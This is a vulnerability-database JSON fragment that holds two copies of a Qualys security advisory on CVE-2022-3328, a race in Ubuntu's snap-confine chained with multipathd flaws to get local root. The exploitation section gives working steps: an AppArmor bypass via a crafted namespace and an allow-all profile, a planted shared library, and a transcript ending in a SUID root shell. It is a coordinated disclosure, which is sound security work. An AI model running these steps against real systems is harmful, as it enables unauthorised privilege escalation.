"https://github.com/vmware/photon/wiki/Security-Update-4.0-147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-12-09T15:12:51", "description": "", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-09T00:00:00", "type": "packetstorm", "title": "snap-confine must_mkdir_and_open_with_perms() Race Condition", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-44731", "CVE-2022-3328", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-12-09T00:00:00", "id": "PACKETSTORM:170176", "href": "https://packetstormsecurity.com/files/170176/snap-confine-must_mkdir_and_open_with_perms-Race-Condition.html", "sourceData": "` \nQualys Security Advisory \n \nRace condition in snap-confine's must_mkdir_and_open_with_perms() \n(CVE-2022-3328) \n \n \n======================================================================== \nContents \n======================================================================== \n \nSummary \nBackground \nExploitation \nAcknowledgments \nTimeline \n \nI can't help but feel a missed opportunity to integrate lyrics from \none of the best songs ever: [SNAP! - The Power (Official Video)] \n-- https://twitter.com/spendergrsec/status/1494420041076461570 \n \n \n======================================================================== \nSummary \n======================================================================== \n \nWe discovered a race condition (CVE-2022-3328) in snap-confine, a \nSUID-root program installed by default on Ubuntu. In this advisory, we \ntell the story of this vulnerability (which was introduced in February \n2022 by the patch for CVE-2021-44731) and detail how we exploited it in \nUbuntu Server (a local privilege escalation, from any user to root) by \ncombining it with two vulnerabilities in multipathd (an authorization \nbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973): \n \nhttps://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt \n \n \n======================================================================== \nBackground \n======================================================================== \n \nLike the crack of the whip, I Snap! attack \nRadical mind, day and night all the time \n-- SNAP! - The Power \n \nIn February 2022, we published CVE-2021-44731 in our \"Lemmings\" advisory \n(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt): \nto set up a snap's sandbox, snap-confine created the temporary directory \n/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did \nnot belong to root; a local attacker could race against snap-confine, \nretain control over /tmp/snap.$SNAP_NAME, and eventually obtain full \nroot privileges. \n \nThis vulnerability was patched by commit acb2b4c (\"cmd/snap-confine: \nPrevent user-controlled race in setup_private_mount\"), which introduced \na new helper function, must_mkdir_and_open_with_perms(): \n \n------------------------------------------------------------------------ \n142 static void setup_private_mount(const char *snap_name) \n... \n169 sc_must_snprintf(base_dir, sizeof(base_dir), \"/tmp/snap.%s\", snap_name); \n... \n176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700); \n------------------------------------------------------------------------ \n55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, \n56 mode_t mode) \n.. \n61 mkdir: \n.. \n67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) { \n.. \n70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); \n.. \n81 if (fstat(fd, &st) < 0) { \n.. \n84 if (st.st_uid != uid || st.st_gid != gid \n85 || st.st_mode != (S_IFDIR | mode)) { \n... \n130 if (rename(dir, random_dir) < 0) { \n... \n135 goto mkdir; \n------------------------------------------------------------------------ \n \n- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if \nit does not exist already; \n \n- if it already exists, and if it does not belong to root (at line 84), \nthen it is moved out of the way (at line 130) by rename()ing it to a \nrandom directory in /tmp, and its creation is retried (at line 135). \n \nWhen we reviewed this patch back in December 2021, we felt very nervous \nabout this rename() call (because it allows a local attacker to rename() \na directory they do not own), and we advised the Ubuntu Security Team to \neither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create \nit in a non-world-writable directory instead of /tmp, or at least to use \nrenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of \nthese ideas were deemed impractical (for example, renameat2() is not \nsupported by older kernel and glibc versions); moreover, we (Qualys) \nfailed to come up with a feasible attack plan against this rename() \ncall, so the patch was kept in its current form. \n \nAfter the release of Ubuntu 22.04 in April 2022, we decided to revisit \nsnap-confine and its recent hardening changes, and we finally found a \nway to exploit the rename() call in must_mkdir_and_open_with_perms(). \n \n \n======================================================================== \nExploitation \n======================================================================== \n \nIt's getting, it's getting, it's getting kinda heavy \nIt's getting, it's getting, it's getting kinda hectic \n-- SNAP! - The Power \n \nThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are: \n \n1/ snap-confine operates in /tmp to create a snap's temporary directory \n(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in \n/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in \nsc_bootstrap_mount_namespace(), where all of the Xs are randomized by \nmkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap \ninstance name by sc_instance_name_validate() (when all of the Xs are \nlowercase alphanumeric): \n \n------------------------------------------------------------------------ \n286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config) \n... \n288 char scratch_dir[] = \"/tmp/snap.rootfs_XXXXXX\"; \n... \n291 if (mkdtemp(scratch_dir) == NULL) { \n... \n303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL); \n... \n319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND, \n... \n331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL; \n... \n342 sc_must_snprintf(dst, sizeof dst, \"%s/%s\", scratch_dir, \n343 mnt->path); \n... \n352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND, \n------------------------------------------------------------------------ \n \n2/ We therefore execute two instances of snap-confine in parallel: \n \n- we block the first snap-confine immediately after it creates its root \ndirectory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this \nrace condition by \"single-stepping\" snap-confine, as explained in our \n\"Lemmings\" advisory); \n \n- we execute the second snap-confine with a snap instance name of \nrootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of \nthis second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX \nof the first snap-confine; \n \n- we kill this second snap-confine immediately after it rename()s its \ntemporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory \n/tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we \nreliably win this race condition with inotify, as explained in our \n\"Lemmings\" advisory); \n \n- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and \nresume the execution of the first snap-confine, whose root directory \nnow belongs to us. \n \n3/ We can therefore create an arbitrary symlink \n/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will \nbind-mount the real /tmp directory (which is world-writable) onto any \ndirectory in the filesystem (because mount() will follow our arbitrary \nsymlink at line 352). \n \nThis ability will eventually allow us to obtain full root privileges, \nbut we must first solve three problems: \n \n------------------------------------------------------------------------ \nProblem a/ We cannot trick snap-confine into rename()ing \n/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and \nmust_mkdir_and_open_with_perms() rename()s it only if it does not belong \nto root! \n \nThis problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX \nbelongs to the user root, but it belongs to the group of our own user, \nso must_mkdir_and_open_with_perms() rename()s it because it does not \nbelong to the group root (at line 84). \n \n------------------------------------------------------------------------ \nProblem b/ We cannot trick snap-confine into following our symlink \n/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace() \nbind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line \n319): if we create our symlink before this bind-mount, then it becomes \ncovered by the squashfs; and we cannot create our symlink after this \nbind-mount, because the squashfs is read-only and belongs to root! \n \nThe \"Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount\" \nof our \"Lemmings\" advisory suggests a solution to this problem: we must \nunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace() \nbind-mounts it (at lines 303 and 319). The \"(deleted)\" technique we used \nin \"Lemmings\" (CVE-2021-3996 in util-linux) was patched in January 2022, \nbut we found a surprisingly simple workaround: \n \nwe mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately \nafter we re-create this directory ourselves; this allows us to unmount \n(with fusermount -u -z) any subsequent bind-mounts (even if they belong \nto root), because fusermount does not check that our FUSE filesystem is \nindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX. \n \n------------------------------------------------------------------------ \nProblem c/ We cannot trick snap-confine into bind-mounting the real /tmp \nonto an arbitrary directory in the filesystem (at line 352), because \nsuch a bind-mount is forbidden by snap-confine's AppArmor profile! \n \nTo solve this problem, we must bypass AppArmor completely, but the \ntechnique we used in our \"Lemmings\" advisory (we wrapped snap-confine's \nexecution in an AppArmor profile that was in \"complain\" mode, not in \n\"enforce\" mode) was patched in February 2022 (by commits 26eed65 and \n4a2eb78, \"ensure that snap-confine is in strict confinement\" and \n\"Tighten AppArmor label check\"): \n \nnow, snap-confine's execution must be wrapped in an AppArmor profile \nthat is in \"enforce\" mode and whose label matches the regular expression \n\"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$\". \n \nWe were about to give up on trying to exploit snap-confine, when we \ndiscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is \ninstalled by default on Ubuntu Server): these two vulnerabilities allow \nus to create a directory named \"failed_wwids\" (user root, group root, \nmode 0700) anywhere in the filesystem, and we were able to transform \nthis very limited directory creation into a complete AppArmor bypass. \n \nAppArmor supports policy namespaces that are loosely related to kernel \nuser namespaces; by default, no AppArmor namespaces exist: \n \n------------------------------------------------------------------------ \n$ ls -la /sys/kernel/security/apparmor/policy/namespaces \ntotal 0 \ndrwxr-xr-x 2 root root 0 Aug 6 12:42 . \ndrwxr-xr-x 5 root root 0 Aug 6 12:42 .. \n------------------------------------------------------------------------ \n \nHowever, we (attackers) can create an AppArmor namespace \"failed_wwids\" \nby exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd: \n \n------------------------------------------------------------------------ \n$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath \n \n$ multipathd list devices | grep 'whitelisted, unmonitored' \nsda1 devnode whitelisted, unmonitored \n... \n \n$ multipathd list list path sda1 \nfail \n \n$ ls -la /sys/kernel/security/apparmor/policy/namespaces \ntotal 0 \ndrwxr-xr-x 3 root root 0 Aug 6 12:42 . \ndrwxr-xr-x 5 root root 0 Aug 6 12:42 .. \ndrwx------ 5 root root 0 Aug 6 13:38 failed_wwids \n------------------------------------------------------------------------ \n \nThen, we can enter this AppArmor namespace by creating and entering an \nunprivileged user namespace: \n \n------------------------------------------------------------------------ \n$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh \n------------------------------------------------------------------------ \n \nInside this namespace, we can create an AppArmor profile labeled \n\"/usr/lib/snapd/snap-confine\" that is in \"enforce\" mode and allows all \npossible operations: \n \n------------------------------------------------------------------------ \n# apparmor_parser -K -a << \"EOF\" \n/usr/lib/snapd/snap-confine (enforce) { \ncapability, \nnetwork, \nmount, \nremount, \numount, \npivot_root, \nptrace, \nsignal, \ndbus, \nunix, \nfile, \nchange_profile, \n} \nEOF \n------------------------------------------------------------------------ \n \nBack in the initial namespace, we check that our \"allow all\" AppArmor \nprofile still exists: \n \n------------------------------------------------------------------------ \n# aa-status \napparmor module is loaded. \n32 profiles are loaded. \n32 profiles are in enforce mode. \n... \n:failed_wwids:/usr/lib/snapd/snap-confine \n------------------------------------------------------------------------ \n \nLast, we make sure that snap-confine accepts our \"allow all\" AppArmor \nprofile (i.e., AppArmor is bypassed, and snap-confine is effectively \nunconfined): \n \n------------------------------------------------------------------------ \n$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent \n... \nDEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine \nDEBUG: apparmor mode is: enforce \n------------------------------------------------------------------------ \n \nWe can therefore bind-mount /tmp onto an arbitrary directory in the \nfilesystem (by exploiting CVE-2022-3328); since we already depend on \nmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath, \ncreate our own shared library /lib/multipath/libchecktur.so, shutdown \nmultipathd (by exploiting CVE-2022-41974), restart multipathd (through \nits Unix socket), and finally obtain full root privileges (because \nmultipathd executes our shared library as root when it restarts): \n \n------------------------------------------------------------------------ \n$ grep multipath /proc/self/mountinfo | wc \n0 0 0 \n \n$ gcc -o CVE-2022-3328 CVE-2022-3328.c \n$ ./CVE-2022-3328 \nscratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c \n \n$ grep multipath /proc/self/mountinfo \n1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw \n... \n \n$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c \n \n$ ps -ef | grep 'multipath[d]' \nroot 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s \n \n$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit \nok \n \n$ ps -ef | grep 'multipath[d]' | wc \n0 0 0 \n \n$ ls -l /tmp/sh \nls: cannot access '/tmp/sh': No such file or directory \n \n$ multipathd list daemon \nerror -104 receiving packet \n \n$ ls -l /tmp/sh \n-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh \n \n$ /tmp/sh -p \n# id \nuid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup) \n^^^^^^^^^^^^ \n------------------------------------------------------------------------ \n \n \n======================================================================== \nAcknowledgments \n======================================================================== \n \nWe thank the Ubuntu security team (Alex Murray and Seth Arnold in \nparticular) and the snapd team for their hard work on this snap-confine \nvulnerability. We also thank the members of linux-distros@openwall. \n \n \n======================================================================== \nTimeline \n======================================================================== \n \n2022-08-23: Contacted security@ubuntu. \n \n2022-11-28: Contacted linux-distros@openwall. \n \n2022-11-30: Coordinated Release Date (17:00 UTC). \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/170176/QSA-snap-confine.txt"}], "zdt": [{"lastseen": "2023-12-02T16:52:17", "description": "Qualys discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory,they tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how they exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973).", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-10T00:00:00", "type": "zdt", "title": "Ubuntu Server snap-confine must_mkdir_and_open_with_perms() Race Condition Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2021-44731", "CVE-2022-3328", "CVE-2022-41973", "CVE-2022-41974"], "modified": "2022-12-10T00:00:00", "id": "1337DAY-ID-38096", "href": "https://0day.today/exploit/description/38096", "sourceData": "Race condition in snap-confine's must_mkdir_and_open_with_perms()\n(CVE-2022-3328)\n\n\n========================================================================\nContents\n========================================================================\n\nSummary\nBackground\nExploitation\nAcknowledgments\nTimeline\n\n I can't help but feel a missed opportunity to integrate lyrics from\n one of the best songs ever: [SNAP! - The Power (Official Video)]\n -- https://twitter.com/spendergrsec/status/1494420041076461570\n\n\n========================================================================\nSummary\n========================================================================\n\nWe discovered a race condition (CVE-2022-3328) in snap-confine, a\nSUID-root program installed by default on Ubuntu. In this advisory, we\ntell the story of this vulnerability (which was introduced in February\n2022 by the patch for CVE-2021-44731) and detail how we exploited it in\nUbuntu Server (a local privilege escalation, from any user to root) by\ncombining it with two vulnerabilities in multipathd (an authorization\nbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):\n\nhttps://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt\n\n\n========================================================================\nBackground\n========================================================================\n\n Like the crack of the whip, I Snap! attack\n Radical mind, day and night all the time\n -- SNAP! - The Power\n\nIn February 2022, we published CVE-2021-44731 in our \"Lemmings\" advisory\n(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):\nto set up a snap's sandbox, snap-confine created the temporary directory\n/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did\nnot belong to root; a local attacker could race against snap-confine,\nretain control over /tmp/snap.$SNAP_NAME, and eventually obtain full\nroot privileges.\n\nThis vulnerability was patched by commit acb2b4c (\"cmd/snap-confine:\nPrevent user-controlled race in setup_private_mount\"), which introduced\na new helper function, must_mkdir_and_open_with_perms():\n\n------------------------------------------------------------------------\n142 static void setup_private_mount(const char *snap_name)\n...\n169 sc_must_snprintf(base_dir, sizeof(base_dir), \"/tmp/snap.%s\", snap_name);\n...\n176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);\n------------------------------------------------------------------------\n 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,\n 56 mode_t mode)\n ..\n 61 mkdir:\n ..\n 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {\n ..\n 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);\n ..\n 81 if (fstat(fd, &st) < 0) {\n ..\n 84 if (st.st_uid != uid || st.st_gid != gid\n 85 || st.st_mode != (S_IFDIR | mode)) {\n...\n130 if (rename(dir, random_dir) < 0) {\n...\n135 goto mkdir;\n------------------------------------------------------------------------\n\n- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if\n it does not exist already;\n\n- if it already exists, and if it does not belong to root (at line 84),\n then it is moved out of the way (at line 130) by rename()ing it to a\n random directory in /tmp, and its creation is retried (at line 135).\n\nWhen we reviewed this patch back in December 2021, we felt very nervous\nabout this rename() call (because it allows a local attacker to rename()\na directory they do not own), and we advised the Ubuntu Security Team to\neither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create\nit in a non-world-writable directory instead of /tmp, or at least to use\nrenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of\nthese ideas were deemed impractical (for example, renameat2() is not\nsupported by older kernel and glibc versions); moreover, we (Qualys)\nfailed to come up with a feasible attack plan against this rename()\ncall, so the patch was kept in its current form.\n\nAfter the release of Ubuntu 22.04 in April 2022, we decided to revisit\nsnap-confine and its recent hardening changes, and we finally found a\nway to exploit the rename() call in must_mkdir_and_open_with_perms().\n\n\n========================================================================\nExploitation\n========================================================================\n\n It's getting, it's getting, it's getting kinda heavy\n It's getting, it's getting, it's getting kinda hectic\n -- SNAP! - The Power\n\nThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:\n\n1/ snap-confine operates in /tmp to create a snap's temporary directory\n(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in\n/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in\nsc_bootstrap_mount_namespace(), where all of the Xs are randomized by\nmkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap\ninstance name by sc_instance_name_validate() (when all of the Xs are\nlowercase alphanumeric):\n\n------------------------------------------------------------------------\n286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)\n...\n288 char scratch_dir[] = \"/tmp/snap.rootfs_XXXXXX\";\n...\n291 if (mkdtemp(scratch_dir) == NULL) {\n...\n303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);\n...\n319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,\n...\n331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;\n...\n342 sc_must_snprintf(dst, sizeof dst, \"%s/%s\", scratch_dir,\n343 mnt->path);\n...\n352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,\n------------------------------------------------------------------------\n\n2/ We therefore execute two instances of snap-confine in parallel:\n\n- we block the first snap-confine immediately after it creates its root\n directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this\n race condition by \"single-stepping\" snap-confine, as explained in our\n \"Lemmings\" advisory);\n\n- we execute the second snap-confine with a snap instance name of\n rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of\n this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX\n of the first snap-confine;\n\n- we kill this second snap-confine immediately after it rename()s its\n temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory\n /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we\n reliably win this race condition with inotify, as explained in our\n \"Lemmings\" advisory);\n\n- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and\n resume the execution of the first snap-confine, whose root directory\n now belongs to us.\n\n3/ We can therefore create an arbitrary symlink\n/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will\nbind-mount the real /tmp directory (which is world-writable) onto any\ndirectory in the filesystem (because mount() will follow our arbitrary\nsymlink at line 352).\n\nThis ability will eventually allow us to obtain full root privileges,\nbut we must first solve three problems:\n\n------------------------------------------------------------------------\nProblem a/ We cannot trick snap-confine into rename()ing\n/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and\nmust_mkdir_and_open_with_perms() rename()s it only if it does not belong\nto root!\n\nThis problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX\nbelongs to the user root, but it belongs to the group of our own user,\nso must_mkdir_and_open_with_perms() rename()s it because it does not\nbelong to the group root (at line 84).\n\n------------------------------------------------------------------------\nProblem b/ We cannot trick snap-confine into following our symlink\n/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()\nbind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line\n319): if we create our symlink before this bind-mount, then it becomes\ncovered by the squashfs; and we cannot create our symlink after this\nbind-mount, because the squashfs is read-only and belongs to root!\n\nThe \"Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount\"\nof our \"Lemmings\" advisory suggests a solution to this problem: we must\nunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()\nbind-mounts it (at lines 303 and 319). The \"(deleted)\" technique we used\nin \"Lemmings\" (CVE-2021-3996 in util-linux) was patched in January 2022,\nbut we found a surprisingly simple workaround:\n\nwe mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately\nafter we re-create this directory ourselves; this allows us to unmount\n(with fusermount -u -z) any subsequent bind-mounts (even if they belong\nto root), because fusermount does not check that our FUSE filesystem is\nindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.\n\n------------------------------------------------------------------------\nProblem c/ We cannot trick snap-confine into bind-mounting the real /tmp\nonto an arbitrary directory in the filesystem (at line 352), because\nsuch a bind-mount is forbidden by snap-confine's AppArmor profile!\n\nTo solve this problem, we must bypass AppArmor completely, but the\ntechnique we used in our \"Lemmings\" advisory (we wrapped snap-confine's\nexecution in an AppArmor profile that was in \"complain\" mode, not in\n\"enforce\" mode) was patched in February 2022 (by commits 26eed65 and\n4a2eb78, \"ensure that snap-confine is in strict confinement\" and\n\"Tighten AppArmor label check\"):\n\nnow, snap-confine's execution must be wrapped in an AppArmor profile\nthat is in \"enforce\" mode and whose label matches the regular expression\n\"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$\".\n\nWe were about to give up on trying to exploit snap-confine, when we\ndiscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is\ninstalled by default on Ubuntu Server): these two vulnerabilities allow\nus to create a directory named \"failed_wwids\" (user root, group root,\nmode 0700) anywhere in the filesystem, and we were able to transform\nthis very limited directory creation into a complete AppArmor bypass.\n\nAppArmor supports policy namespaces that are loosely related to kernel\nuser namespaces; by default, no AppArmor namespaces exist:\n\n------------------------------------------------------------------------\n$ ls -la /sys/kernel/security/apparmor/policy/namespaces\ntotal 0\ndrwxr-xr-x 2 root root 0 Aug 6 12:42 .\ndrwxr-xr-x 5 root root 0 Aug 6 12:42 ..\n------------------------------------------------------------------------\n\nHowever, we (attackers) can create an AppArmor namespace \"failed_wwids\"\nby exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:\n\n------------------------------------------------------------------------\n$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath\n\n$ multipathd list devices | grep 'whitelisted, unmonitored'\n sda1 devnode whitelisted, unmonitored\n ...\n\n$ multipathd list list path sda1\nfail\n\n$ ls -la /sys/kernel/security/apparmor/policy/namespaces\ntotal 0\ndrwxr-xr-x 3 root root 0 Aug 6 12:42 .\ndrwxr-xr-x 5 root root 0 Aug 6 12:42 ..\ndrwx------ 5 root root 0 Aug 6 13:38 failed_wwids\n------------------------------------------------------------------------\n\nThen, we can enter this AppArmor namespace by creating and entering an\nunprivileged user namespace:\n\n------------------------------------------------------------------------\n$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh\n------------------------------------------------------------------------\n\nInside this namespace, we can create an AppArmor profile labeled\n\"/usr/lib/snapd/snap-confine\" that is in \"enforce\" mode and allows all\npossible operations:\n\n------------------------------------------------------------------------\n# apparmor_parser -K -a << \"EOF\"\n/usr/lib/snapd/snap-confine (enforce) {\ncapability,\nnetwork,\nmount,\nremount,\numount,\npivot_root,\nptrace,\nsignal,\ndbus,\nunix,\nfile,\nchange_profile,\n}\nEOF\n------------------------------------------------------------------------\n\nBack in the initial namespace, we check that our \"allow all\" AppArmor\nprofile still exists:\n\n------------------------------------------------------------------------\n# aa-status\napparmor module is loaded.\n32 profiles are loaded.\n32 profiles are in enforce mode.\n ...\n :failed_wwids:/usr/lib/snapd/snap-confine\n------------------------------------------------------------------------\n\nLast, we make sure that snap-confine accepts our \"allow all\" AppArmor\nprofile (i.e., AppArmor is bypassed, and snap-confine is effectively\nunconfined):\n\n------------------------------------------------------------------------\n$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent\n...\nDEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine\nDEBUG: apparmor mode is: enforce\n------------------------------------------------------------------------\n\nWe can therefore bind-mount /tmp onto an arbitrary directory in the\nfilesystem (by exploiting CVE-2022-3328); since we already depend on\nmultipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,\ncreate our own shared library /lib/multipath/libchecktur.so, shutdown\nmultipathd (by exploiting CVE-2022-41974), restart multipathd (through\nits Unix socket), and finally obtain full root privileges (because\nmultipathd executes our shared library as root when it restarts):\n\n------------------------------------------------------------------------\n$ grep multipath /proc/self/mountinfo | wc\n 0 0 0\n\n$ gcc -o CVE-2022-3328 CVE-2022-3328.c\n$ ./CVE-2022-3328\nscratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c\n\n$ grep multipath /proc/self/mountinfo\n1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw\n...\n\n$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c\n\n$ ps -ef | grep 'multipath[d]'\nroot 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s\n\n$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit\nok\n\n$ ps -ef | grep 'multipath[d]' | wc\n 0 0 0\n\n$ ls -l /tmp/sh\nls: cannot access '/tmp/sh': No such file or directory\n\n$ multipathd list daemon\nerror -104 receiving packet\n\n$ ls -l /tmp/sh\n-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh\n\n$ /tmp/sh -p\n# 